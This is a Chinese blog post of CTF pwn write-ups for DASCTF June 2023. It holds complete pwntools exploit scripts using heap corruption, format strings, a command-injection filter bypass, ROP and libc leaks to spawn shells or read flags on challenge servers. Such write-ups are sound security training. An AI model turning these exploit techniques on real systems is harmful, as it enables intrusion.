DASCTF 2023六月挑战赛|二进制专项 pwn

最新推荐文章于 2024-03-13 12:11:26 发布
最新推荐文章于 2024-03-13 12:11:26 发布
阅读量471 收藏 1
点赞数 3
文章标签: python 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_63437215/article/details/131516166
版权

easynote

2.23版本的uaf,用realloc调一下栈帧。

exp

from pwn import *
context.log_level='debug'
r=process('./pwn')
elf=ELF('./pwn')
libc=elf.libc


def add(size,content):
    r.sendlineafter("5. exit",'1')
    r.sendlineafter("The length of your content --->",str(size))
    r.sendafter("Content --->",content)

def edit(idx,size,content):
    r.sendlineafter("5. exit",'2')
    r.sendlineafter("Index --->",str(idx))
    r.sendlineafter("The length of your content --->",str(size))
    r.sendafter("Content --->",content)
def delete(idx):
    r.sendlineafter("5. exit",'3')
    r.sendlineafter("Index --->",str(idx))
def show(idx):
    r.sendlineafter("5. exit",'4')
    r.sendlineafter("Index --->",str(idx))

add(0x200,'a')#0
add(0x60,'a')#1
add(0x20,'a')#2
delete(0)
add(0x40,'a')#0
show(0)
libc_base=u64(r.recvuntil('\x7f')[-6:].ljust(8,b'\x00'))-0x200-0x61+0x78-0x10-88-libc.sym['__malloc_hook']
print("libc_base---------->",hex(libc_base))
malloc_hook=libc_base+libc.sym["__malloc_hook"]-0x23
system=libc_base+libc.sym['system']
realloc=libc_base+libc.sym["realloc"]+6
one_gadget=[0x45226,0x4527a,0xf03a4,0xf1247]
ogg=one_gadget[1]+libc_base
delete(1)
edit(1,0x40,p64(malloc_hook))
add(0x200-0x50,'a')#1
add(0x60,'a')#3
add(0x60,b'a'*(0x13-8)+p64(ogg)+p64(realloc))#4
r.sendlineafter("5. exit",'1')
r.sendlineafter("The length of your content --->",str(50))
# gdb.attach(r)
r.interactive()

fooooood

这个题非预期可以直接循环打印远程栈上的环境变量,从而爆破出flag

exp

from pwn import *
context.log_level='debug'
r=process('./pwn')
# r=remote('node4.buuoj.cn',28134)
elf=ELF('./pwn')


for i in range(1,100):
    try:
        # r=process('./pwn')
        r=remote('node4.buuoj.cn',28134)
        elf=ELF('./pwn')
        r.sendlineafter("Give me your name:",'s')
        for j in range(3):
            r.recvuntil("food: ")   
            r.sendline('%'+str(10+3*i+j)+'$s.')
            print(i,r.recvuntil(b'.',drop=True))
    except EOFError:
        pass

 server

首先需要通过认证,这里需要判断对应的key文件是否存在,我们可以通过输入很多/来绕过。

接着有一个任意命令执行 ,过滤掉了一些字符,不过我们仍然可以通过cat flag来获取;由于过滤了空格,所以我们可以用 \t 代替,由于有长度限制,我们需要使用通配符,最终执行'\ncat\tfl*\n。

exp

from pwn import *
context.log_level='debug'
r=process('./pwn_7')
r=remote('node4.buuoj.cn',28338)
elf=ELF('./pwn_7')


r.recvuntil('>>')
r.sendline('1')
# gdb.attach(r)
r.recvuntil('Please input the key of admin : ')
r.sendline("../"+"/"*0xf+"///flag")

r.recvuntil('>>')
r.sendline('2')

r.recvuntil(':')
r.send('12cat\tfl*\n')

r.recvuntil('>>')
r.sendline('2')

r.recvuntil(':')
r.send("'\n")
r.interactive()

 can_you_find_me

程序只有add,delete操作,在add的pushinfo中存在off by null漏洞

 add限制堆块最大0x800,最多申请16次,所以采用填满tcache不可取,因为堆块不够用,需要直接申请大于0x410的堆块。而本题没有show函数,所以需要打stdout结构体泄露libc,需要爆破1字节。

exp

from pwn import *
context.log_level='debug'
r=remote('node4.buuoj.cn',25072)
# r=process('./pwn')
elf=ELF('./pwn')
libc=elf.libc

def add(size,content):
    r.sendlineafter("choice:",'1')
    r.sendlineafter("Size:",str(size))
    r.sendlineafter("Data:",content)


def delete(idx):
    r.sendlineafter("choice:",'2')
    r.sendlineafter("Index:",str(idx))

add(0x6f8,"0")#0
add(0x3f8,"1")#1
add(0x2f8,'2')#2
add(0x7f8,'3')#3

add(0x20,'/bin/sh\x00')#4
delete(0)
delete(2)
add(0x2f8,b'a'*0x2f0+p64(0x700++0x300+0x400))#5 0 2
delete(3)
delete(1)

add(0x6f8,'0')#5
add(0x20,'\x60\xe7')#6
add(0x3f8,'0')#7
payload=p64(0xfbad1887)+p64(0)*3+b'\x88'

add(0x3f8,payload)#8
print("----------------------214124124124124-------------421412-412----------")
libc_base=u64(r.recvuntil(b'\x7f')[-6:].ljust(8,b'\x00'))-libc.sym['_IO_2_1_stdout_']-131
print("libc_base----------->",hex(libc_base))
free_hook=libc_base+libc.sym['__free_hook']
one_gadget=[0x4f2a5,0x4f302,0x10a2fc]
ogg=libc_base+one_gadget[1]
delete(0)
payload=b'c'*0x3c8+p64(0x300)+p64(free_hook)
add(0x400,payload)

add(0x2f8,'a')
add(0x2f8,p64(ogg))
delete(4)
# gdb.attach(r)
r.interactive()

 matchmaking platform

 漏洞点位于sub_12b7函数,char v3的范围是-128-->127,本题执行else分支可以是v3加到128,从而溢出变成-80,对偏移为-80的位置进行操作。可进行两次。

思路:首先劫持bss上的stdout结构体,修改stdout泄露libc,然后利用ret2dlresolve即可。

exp

from pwn import *
context.log_level='debug'

def pwn():
    r.sendafter("Age >> ",'a'*0x80+'\x80')
    r.sendlineafter("Photo(URL) >> ",p64(0xfbad1887)+p64(0)*3+b'\xb0\x5d')
    pie_base = u64(r.recv(6, timeout = 0.5).ljust(8, b'\x00')) - 0x40a0
    if (pie_base & 0xfff) != 0 :
        exit(-1)
    payload = b'/bin/sh\x00' + p64(pie_base + 0x4140 - 0x67) + b'system\x00'
    # gdb.attach(r)
    r.sendafter("Name >> ",payload.ljust(0x80,b'\x00')+b'\x08')
    print("pie_base--------->",hex(pie_base))
    payload = p64(pie_base + 0x8).ljust(0x68, b'\x00') + p64(pie_base + 0x4140)
    r.sendlineafter("Hobby >> ", payload)

    r.interactive()
if __name__ == '__main__':
    while True:
        global r
        try :
            r = process("./pwn")
            pwn()
            break
        except :
            r.close()

A dream

 

 

 在父线程中存在栈溢出,子线程不断调用write。

且父线程开启沙箱。

思路一:利用栈溢出进行迁移,修改write的got表为栈溢出位置的read,然后使父线程sleep进入子线程进行rop,因为父线程开启的沙箱并不会影响到子线程。

思路二:利用栈溢出进行迁移,泄露libc,再利用environ环境变量泄露栈,由于远程的flag存放在栈中,所以可以加偏移循环爆破flag。

这里给出思路二的exp:

exp

from pwn import *
context(os = 'linux', arch = 'amd64', log_level = 'debug')
# r=process("./pwn_9")
r=remote('node4.buuoj.cn',29981)
elf=ELF("./pwn_9")
libc=ELF('./libc6_2.31-0ubuntu9.7_amd64.so')
puts_plt=elf.plt['puts']
puts_got=elf.got['puts']
bss = 0x404080 + 0x100
magic_read = 0x4013AE
r.recvuntil('winmt has a dream')

payload1 = b'a'*0x40 + p64(bss+0x40) + p64(magic_read)
r.send(payload1)
sleep(0.1)
# gdb.attach(r)
pop_rdi_ret = 0x401483
pop_rsi_r15_ret = 0x401481
pop_rbp=0x000000000040123d
leave_ret = 0x40136c
payload2 = p64(pop_rdi_ret) + p64(puts_got) + p64(puts_plt) + p64(pop_rbp) + p64(bss+0x100) + p64(magic_read)
payload2 = payload2.ljust(0x40, b'\x00') + p64(bss-8) + p64(leave_ret)
r.send(payload2)
sleep(0.1)
libc_base=u64(r.recvuntil(b'\x7f')[-6:].ljust(8,b'\x00'))-libc.sym['puts']
print("libc_base----------->",hex(libc_base))
environ=libc_base+libc.sym['environ']


payload3=p64(pop_rdi_ret) + p64(environ) + p64(puts_plt) + p64(pop_rbp) + p64(bss+0x100+0x100) + p64(magic_read)
payload3 = payload3.ljust(0x40, b'\x00') + p64(bss+0x100-0x40-8) + p64(leave_ret)
r.send(payload3)
sleep(0.1)
stack=u64(r.recvuntil(b'\x7f')[-6:].ljust(8,b'\x00'))
print('stack------>',hex(stack))

payload4=p64(pop_rdi_ret) + p64(stack+8) + p64(puts_plt) + p64(pop_rbp) + p64(bss+0x100+0x100*2) + p64(magic_read)
payload4 = payload4.ljust(0x40, b'\x00') + p64(bss+0x100+0x100-0x40-8) + p64(leave_ret)
r.send(payload4)
sleep(0.1)
stack1=u64(r.recvuntil(b'\x7f')[-6:].ljust(8,b'\x00'))
print('stack1------>',hex(stack1))
# pause()
for i in range(2,50,1):
    payload5=p64(pop_rdi_ret) + p64(stack1-1+8*(i+39)) + p64(puts_plt) + p64(pop_rbp) + p64(bss+0x100+0x100*(i+1)) + p64(magic_read)
    payload5 = payload5.ljust(0x40, b'\x00') + p64(bss+0x100+0x100*i-0x40-8) + p64(leave_ret)
    r.send(payload5)
    # sleep(0.1)

r.interactive()

 

noka 

本题libc是2.35。

 只有add和show操作,还有一个任意地址读写的后门。这些操作一共可以使用11次。

思路:1.将malloc的got表换成cin实现任意读写

           2.利用stdout泄露libc地址

           3.利用environ环境变量获得栈地址,覆盖libc_start_main为rop执行getshell。

exp

from pwn import *
context.log_level='debug'
r=process('./noka')
elf=ELF('./noka')
libc=ELF('./libc.so.6')

malloc_got=0x404030
cin_int=0x401254
ptr_addr=0x4040b0
def add(size,content):  
    r.sendlineafter('>','1')
    r.sendlineafter("size: ",str(size))
    r.sendafter("text: ",content)

def show():  
    r.sendlineafter('>','2')

def backdoor(point,value):  
    r.sendlineafter('>','3')
    r.sendlineafter("Break Point: ",str(point))
    r.sendlineafter("Break Value: ",str(value))

def gint(size,addr,content):
    r.sendlineafter('>','1')
    r.sendlineafter("size: ",str(size))
    r.send(addr)
    r.sendafter("text: ",content)


backdoor(malloc_got,cin_int)#1
gint(10,str(0x04040A0),"a")#2
show()#3
libc_base=u64(r.recvuntil(b'\x7f')[-6:].ljust(8,b'\x00'))-libc.sym['stderr']-0x1+0x200
print("libc_base-------->",hex(libc_base))

environ=libc_base+libc.sym['environ']
print("environ------->",hex(environ))

gint(10,str(ptr_addr),p64(environ))#4
show()#5
stack=u64(r.recvuntil(b'\x7f')[-6:].ljust(8,b'\x00'))
print('stack----------->',hex(stack))
libc_start_main=stack-(0x7fff13361bc8-0x7fff13361aa8)
print("libc_start_main------>",hex(libc_start_main))

num_addr=0x404060

gint(10,str(num_addr),'a')#6

system=libc_base+libc.sym['system']
pop_rdi=libc_base+0x000000000002a3e5
pop_rdi_rbp=libc_base+0x000000000002a745
binsh=libc_base+next(libc.search(b'/bin/sh\x00'))


backdoor(str(libc_start_main),str(pop_rdi_rbp))#7
gint(10,str(num_addr),'a')#8
backdoor(str(libc_start_main+8),str(binsh))#9
gint(10,str(num_addr),'a')#10
gdb.attach(r)
backdoor(str(libc_start_main+0x18),str(system))#11

# gdb.attach(r)

r.interactive()

 

Approoooooooaching

2.35版本

vmpwn,case1申请堆块,case2写堆块,case3就是对写入堆块的字符进行逐个解析,解析成1、2、3等数字,不过后边的解析成数字之后还有一些其他的命令,也没试,做的时候也没用上。case4就是匹配数字并执行对应的命令。

刚开始先试了这个case6的gatchar看看读到了栈上的哪个位置,测试发现直接getchar是返回地址的下一个字节,然后又从程序中发现了system函数,直接搜索/bin/sh定位到

于是就想到可以用case2的--v3使得读取字符时向上覆盖到返回地址,然后又看到原本返回地址与后门函数地址只差了最后一个字节,因此就比较清晰了,先通过--v3,然后getchar改返回地址,退出时即执行后门函数。不过这里有一点,getchar第一次输入不进去字符,读取的一直是'\n',索性读两次,把第一次覆盖了就行。

exp

from pwn import *
context.log_level='debug'
r=remote('139.155.140.235',9999)
# r=process('./bf')
elf=ELF('./bf')
libc=elf.libc


def add(size):
    r.sendlineafter("Give me your choice: ",'1')
    r.sendlineafter("size: ",str(size))

def cin(content):
    r.sendlineafter("Give me your choice: ",'2')
    r.sendlineafter("text: ",content)

def makecode():
    r.sendlineafter("Give me your choice: ",'3')

def usecode():
    r.sendlineafter("Give me your choice: ",'4')

add(0x800)
cin('iiiiyy\x00')
makecode()
# gdb.attach(r)
usecode()
r.sendline('\xe0')
r.interactive()

可以发现,经过两次修改,返回地址成功覆盖成后门函数

 

KingKi1L3r
关注
  • 3
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
DASCTF 2023六月挑战赛 二进制专项 easynote
z1r0的博客
06-05 384
uaf,堆溢出,2.23。
DASCTF 2023六月挑战赛二进制专项 PWN
weixin_51890658的博客
06-05 419
通过ida分析和gdb调试i在rbp-c中,它是int类型占4字节,还有两次格式化字符串漏洞,可通过这两次修改为i的值,第一次是把args参数链修改为i地址,第二次是修改i值即可再次使用格式化字符串漏洞。因为有堆溢出和uaf,可以伪装fastchunk,通过gdb调试0x602095地址的值为0x7f,可伪装。64位,也给了libc库,开了canary和pie地址随机 拖入ida看存在格式化字符串漏洞,有3次。64位的,给了libc库,开了canary,拖入ida分析,在edit函数中存在堆溢出。
DASCTF 2023六月挑战赛二进制专项ez_exe复现
m0_75098930的博客
07-02 209
有点小搞,python逆向,最开始从pyc里还原出源码的时候不太能看懂,就只能看懂几个读写的操作,当时没太懂意思,然后运行程序后发现bin1变成了exe,提示是用exe来解密bin2,脑子抽了,没懂意思,结果是直接patch原exe的bin1成bin2,以这种方式解密,解密完bin2就是一个简单的xxtea。除了盖delta的数值外,解密的轮数也变了,直接用52/n(找了好久,小搞)
[DASCTF 2023六月挑战赛二进制专项] 5个pwn
weixin_52640415的博客
06-04 1361
格式化字符串漏洞利用argv链 6次free的off_by_null printf改system
DASCTF 2023六月挑战赛 | 二进制专项 Reverse
ULGANOY的博客
03-13 939
DASCTF 2023六月挑战赛 | 二进制专项 Reverse
Bugku S3 AWD排位赛-9 pwn二进制
08-27
Bugku S3 AWD排位赛-9 pwn二进制
arm32 android版pwn-level6二进制文件+gdbserver+lldb+socat
最新发布
04-17
arm32 android版pwn-level6二进制文件+gdbserver+lldb+socat,文章pwn - 零基础ROP之Android ARM 32位篇(新修订)https://blog.csdn.net/tabactivity/article/details/137780714 全部资料文件。 0基础pwn
pwnlib:基于C ++的二进制文件分析和CTF pwn利用代码生成框架
02-20
基于C ++的二进制文件分析和CTF pwn利用代码生成框架。玩得开心! 简介 基于Linux平台下的C ++ 11标准,为CTF pwn中的堆利用堆生成过渡生成一个快速利用脚本。 该程序仍在开发中,目前包含Half_Auto_Mod和Auto_Mod这...
2021-鹏城实验室-pwn-babyheap.zip
09-28
在本文中,我们将深入探讨2021年鹏城实验室的"Pwn-BabyHeap"挑战,这是一道涉及二进制安全和pwn技术的竞赛题目。本题主要考察了"off-by-null"漏洞的利用,这是一个在C语言编程中常见的安全问题。我们将围绕这个主题...
pwn:渗透测试,Metasploit,二进制开发,逆向工程,加密和其他与CTF相关的活动的日志
04-28
这个名为“pwn:渗透测试,Metasploit,二进制开发,逆向工程,加密和其他与CTF相关的活动的日志”的压缩包文件,很可能包含了与这些主题相关的学习资料和实践记录。 1. 渗透测试:这是一种授权的攻击方式,用来评估...
2023DASCTF六月挑战赛二进制专项--reverse
qq_73505302的博客
12-26 327
找到:https://github.com/google/pytype/blob/main/pytype/pyc/magic.py(不同版本python对应的magic number。如果在网络上查询相关的API的话可以很清楚的了解到这些API函数在一起调用最终会实现屏幕图像截取的功能。既然这个加密的bmp的每一个字节进行的都是异或,那我们可以将前两个字节异或看看。的第2个和第3个字符,按照这个序列,我们向后将密钥向后延申看看后面的情况如何。我们随便打开一个BMP类型的文件,用010看看。
DASCTF Apr.2023 X SU战队2023开局之战 pwn
m0_63437215的博客
04-24 630
DASCTF Apr.2023 X SU战队2023开局之战
DASCTF 2023六月挑战赛 二进制专项 server
z1r0的博客
06-05 312
两个函数的rbp - 0x40这里是重复使用的,漏洞点出在system可以执行输入的,14DA过滤字符,但是可以复用空间,然后\n分割命令即可。
2023年春秋杯网络安全联赛春季赛Reverse题目复现
OrientalGlass的博客
05-30 1306
下方的call sun_7f006f7c2536就是主函数,跟进重新识别即可看到逻辑(这里不做详细介绍,以选项2为主)往上翻找到起始地址,对loc_loc_7F3BB0FB6536按p识别为函数就可以看到主函数逻辑了。然后还有一些没有被正确识别的函数,需要手动跟进按p识别为函数,然后回到反汇编界面按f5重新识别即可。另外两块红色区域同理,重新识别后可以看到主函数(如果看不到那就对tea函数交叉引用向上找)一直按f7,最后可以发现程序会卡住,并且还能看见InputFlag字符串,这里就是主函数了。
DASCTF2023】Misc mp3
Makabakahaha的博客
02-02 728
浅浅记录DASCTF初赛的一道misc题~
DASCTF 7月赋能赛pwn wp
N1rvana的博客
07-25 500
DASCTF 7月赋能赛pwn wp
DASCTF X GFCTF 2022十月挑战赛 - pwn
z1r0的博客
10-28 873
所以思路很好想出来,首先可以利用rax来控制rsi进行read任意写,再利用rax控制rsi到read_got这里进行任意地址写,写成syscall。这个时候我们把rax设置成0x3b也就是execve,控制rdi为bin_sh,把rsi和rdx置为0,最后直接调用read就可以getshell了。发现了这一个gadget,而404018正好是bss的地址,可读可写,所以我们可以利用上面第一次的任意地址写将bss这里的地址写成bin_sh。这里的地方,并且最后还可以控制ret。
DASCTF 7月部分pwn
starssgo的博客
07-25 1409
做了pwn1跟pwn3,pwn2没做出来(俺是废物)… pwn1 签到题,但是我们要记住 .text:080485F8 mov eax, 0 .text:080485FD mov ecx, [ebp+var_4] .text:08048600 leave .text:08048601 lea esp, [ecx-4] .text:08048604
2021DASCTF July X CBCTF pwn wp
qq_39948058的博客
08-26 297
此题是7月末的比赛,本人旧博客搬到新博客啦,各位见谅哈(实际就是没钱租用服务器啦呜呜) **EasyHeap wp: Edit有堆溢出,有沙箱,禁用了execute,freehook为setcontext+5361即可,尝试orw就行了。写shellcode到hook,赋予权限即可,** exp: from pwn import * context(os='linux',arch='amd64',log_level='debug') p=process('./Easyheap') p=rem
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值